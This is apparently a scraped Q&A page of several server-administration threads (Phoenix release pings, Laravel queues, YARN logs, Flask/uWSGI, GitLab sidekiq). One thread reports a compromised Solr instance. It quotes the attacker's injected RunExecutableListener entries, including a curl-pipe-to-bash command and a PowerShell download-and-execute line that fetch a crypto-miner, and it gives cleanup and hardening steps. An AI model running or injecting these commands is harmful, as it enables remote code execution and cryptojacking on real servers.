Phoenix Deployment with EXRM - ubuntu-14.04

I am trying to deploy a phoenix app on a Ubuntu Server with EXRM.
The release runs perfectly and the website is accessible but when I ping the release it says the
Node 'myapp#myhost' not responding to pings.
vm.args file
## Name of the node
-sname pxblog
## Cookie for distributed erlang
-setcookie pxblog
## Heartbeat management; auto-restarts VM if it dies or becomes unresponsive
## (Disabled by default..use with caution!)
##-heart
## Enable kernel poll and a few async threads
##+K true
##+A 5
## Increase number of concurrent ports/sockets
##-env ERL_MAX_PORTS 4096
## Tweak GC to run more often
##-env ERL_FULLSWEEP_AFTER 10
Updated vm.args (Solved)
## Name of the node
-sname pxblog#localhost
## Cookie for distributed erlang
-setcookie pxblog
## Heartbeat management; auto-restarts VM if it dies or becomes unresponsive
## (Disabled by default..use with caution!)
##-heart
## Enable kernel poll and a few async threads
##+K true
##+A 5
## Increase number of concurrent ports/sockets
##-env ERL_MAX_PORTS 4096
## Tweak GC to run more often
##-env ERL_FULLSWEEP_AFTER 10

Check the vm.args file. Look for a line similar to this:
## Name of the node
-name test#127.0.0.1
I suspect the name you'll find there is "myapp#myhost". Try changing it to yourappname#localhost or yourappname#127.0.0.1. NB: I do not mean you should put the literal string yourappname there. Substitute the name of your app.

Related

Laravel PHP queue:work not working on linux

I tried to use supervisor and this is my config:
Status
In my job table
Also the "tries=3" is not working and my worker.log is also null
The jobs in your table are in the 'default' queue, but you've told your workers to only process jobs from the 'jobs' queue.
In the supervisor config either remove --queue=jobs entirely, or change it to --queue=default

Where is this log file?

Running a distributed application on Spark/YARN, I get the following error that kills an executor, and eventually kills the entire application:
#
# A fatal error has been detected by the Java Runtime Environment:
#
# SIGSEGV (0xb) at pc=0x00007f4f85ab41b1, pid=3309, tid=0x00007f4f90a4e700
#
# JRE version: Java(TM) SE Runtime Environment (8.0_112-b15) (build 1.8.0_112-b15)
# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.112-b15 mixed mode linux-amd64 compressed oops)
# Problematic frame:
# C [libSalience6.so+0x7631b1] lxaArrayTrie::Get(std::string const&) const+0x71
#
# Core dump written. Default location: /data/hadoop/yarn/local/usercache/koverse/appcache/application_1537930191769_0049/container_e08_1537930191769_0049_01_000016/core or core.3309
#
# An error report file with more information is saved as:
# /data/hadoop/yarn/local/usercache/koverse/appcache/application_1537930191769_0049/container_e08_1537930191769_0049_01_000016/hs_err_pid3309.log
#
# If you would like to submit a bug report, please visit:
# http://bugreport.java.com/bugreport/crash.jsp
# The crash happened outside the Java Virtual Machine in native code.
# See problematic frame for where to report the bug.
#
There is a segmentation fault in libSalience6.so. So far so good!
But neither the core dump or logs files are where they say they are.
This error occurred on slv004 of a cluster, so the yarn application directory
/data/hadoop/yarn/local/usercache/koverse/appcache/application_1537930191769_0049
exists on that node. But a the container directory does not exist, and a find detects no log files.
Any ideas where this log file might be?
You probably have log aggregation enabled. If that's the case, log files are preserved in HDFS in TFile format.
You can check these logs using Application history server. This web app is accessible on port 8188 by default.
Try this
yarn logs -applicationId application_1537930191769_0049

Deploying Flask APP with UWSGI,Nginx,direnv and systemd

I have created an API using FLASK which I am trying to deploy on a linux server by creating a systemd service.
I have used direnv to setup input parameters to the app like database connections. Below is what the file looks like :
The uwsgi config is as below :
The systemd file has the following entries:
I get the follwing error in my uwsgi logs whenever I try to reach the service on my browser :
--- no python application found, check your startup logs for errors ---
[pid: 23791|app: -1|req: -1/3] 192.168.9.180 () {44 vars in 719 bytes} [Thu Oct 11 14:35:09 2018] GET / => generated 21 bytes in 0 msecs (HTTP/1.1 500) 2 headers in 83 bytes (1 switches on core 0)
My understanding is the ExecStart command in the systemd file is not able to invoke the direnv set variables , hence i added the ExecStartPre entry but even does not seem to work.
Any hints/ideas are appreciated.
Note: The application is accessible without errors when I run the uwsgi via command line from my python virtual environment :
uwsgi --socket 0.0.0.0:5000 --protocol=http -w app:app
i have a few advises that may help you, probably only the first one is the one you need...
1) Either move all your env variable defined in direnv to the systemd unit as Environment or move them into a special file (similar to the you already have) without the "source activate" line and the export, and then pass that file as EnvironmentFile , this is the doc for that https://www.freedesktop.org/software/systemd/man/systemd.exec.html#Environment
2) Your ExecStartPre does nothing really, even tho you do "cd" into the path, that is lost and is not persistent. you should remove it.
3) By setting your PATH to only that path, you are restricting your self, i would recommend see the value of your current PATH and then set it to that value. but otherwise at least add "/usr/local/bin:/bin:/usr/bin:/usr/local/sbin:/usr/sbin". now spoiler alert, you probably dont need to set it.
4) put the socket in /run//socket.socket directory and let systemd manage your /run/<yourapp> with RuntimeDirectory directive.
good luck!

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
This site uses docker.
htop told me that all cores loaded on 100% by the process /var/tmp/sustes with the user 8983. Tried to find out what is sustes, but Google did not help, but 8983 tells that the problem in Solr container.
Tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
Rolled back to v6.6.4 (as the only available v6 on docker-hub https://hub.docker.com/_/solr/) as site should continue working.
In Dockers logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
"exe":"sh",
"name":"newlistener-02",
"args":[
-"c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code which installs crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can find full config, but right now we need just listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings at solrconfig.xml, I found them at /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be found at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay
Fixing:
Clean configoverlay.json, or simply remove this file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to Start\Stop - https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is being fixed in v5.5.5, 6.6.2+, 7.1+
which is due to freely available http://example.com:8983 for anyone, so despite this exploit is fixed, lets...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
"authentication":{
"blockUnknown": true,
"class":"solr.BasicAuthPlugin",
"credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0=
Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
},
"authorization":{
"class":"solr.RuleBasedAuthorizationPlugin",
"permissions":[{"name":"security-edit",
"role":"admin"}],
"user-role":{"solr":"admin"}
}}
This file must be dropped at /opt/solr/server/solr/ (ie next to solr.xml)
As Solr has its own Hash-checker (as a sha256(password+salt) hash), a typical solution can not be used here. The easiest way to generate hash that Ive found is to download jar file from here http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/
# project/sources/docker-compose.yml (just Solr part)
solr:
build: ./dockerfiles/solr/
container_name: solr-container
# Check if 'default' core is created. If not, then create it.
entrypoint:
- docker-entrypoint.sh
- solr-precreate
- default
# Access to web interface from host to container, i.e 127.0.0.1:8983
ports:
- "8983:8983"
volumes:
- ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
- ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes

GitLab/GitLab-CI Omnibus package configure sidekiq concurrency

My server has way too many sidekiq processes running for my needs in my GitLab install, both GitLab and GitLab-CI were running a ton of them. I have it running on DigitalOcean droplet with 1GB Ram 20GB SSD Disk on Ubuntu 14.04 x64, and it was regularly telling me I need to restart my server, and when I check htop I have 17-30 sidekiq processes running gitlab-rails [0 of 25 busy]
There is no clear documentation on how to change the number of sidekiq processes, or the concurrency, for the Omnibus install of GitLab/GitLab-CI.
What is the best way to adjust this and have it persist through upgrades?
I still have a problem with the number of processes slowly growing over time, but the best solution I have come up with so far for limiting the concurrency setting is to alter these two files:
/opt/gitlab/embedded/service/gitlab-rails/config/initializers/4_sidekiq.rb
/opt/gitlab/embedded/service/gitlab-ci/config/initializers/3_sidekiq.rb
By adding config.options[:concurrency] = 2 inside Sidekiq.configure_server do |config|
So, for example, my final 4_sidekiq.rb file looks like this:
# Custom Redis configuration
config_file = Rails.root.join('config', 'resque.yml')
resque_url = if File.exists?(config_file)
YAML.load_file(config_file)[Rails.env]
else
"redis://localhost:6379"
end
Sidekiq.configure_server do |config|
config.options[:concurrency] = 2
config.redis = {
url: resque_url,
namespace: 'resque:gitlab'
}
config.server_middleware do |chain|
chain.add Gitlab::SidekiqMiddleware::ArgumentsLogger if ENV['SIDEKIQ_LOG_ARGUMENTS']
chain.add Gitlab::SidekiqMiddleware::MemoryKiller if ENV['SIDEKIQ_MEMORY_KILLER_MAX_RSS']
end
end
Sidekiq.configure_client do |config|
config.redis = {
url: resque_url,
namespace: 'resque:gitlab'
}
end
At least for gitlab-omnibus we can do that easy in /etc/gitlab/gitlab.rb
##################
# GitLab Sidekiq #
##################
# sidekiq['log_directory'] = "/var/log/gitlab/sidekiq"
# sidekiq['shutdown_timeout'] = 4
# sidekiq['concurrency'] = 25
sidekiq['concurrency'] = 5
So now it says "[0 of 5 busy]"
Check out: hardware requirements for GitLab, and killing sidekick processes is a no go, GitLab depends on it to perform a lot of async actions.
1G of memory is not enough!

Resources